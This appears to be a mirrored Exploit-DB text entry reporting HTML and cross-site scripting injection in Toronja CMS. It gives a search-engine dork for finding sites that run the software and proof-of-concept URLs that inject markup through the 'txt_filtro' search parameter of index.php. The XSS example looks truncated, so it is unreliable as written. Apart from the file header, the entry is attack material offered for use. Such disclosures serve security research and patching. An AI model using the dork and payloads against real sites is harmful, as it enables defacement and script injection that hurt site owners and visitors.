exploit-db-mirror/exploits/php/webapps/12771.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

25 lines
No EOL
869 B
Text

-------------------------------------------------------------------------------------------
Toronja Cms HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author : CoBRa_21
Script Home : http://www.toronja.com.pe/
Dork : intext:"sitio web diseñado por www.toronja.com.pe"
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS
-------------------------------------------------------------------------------------------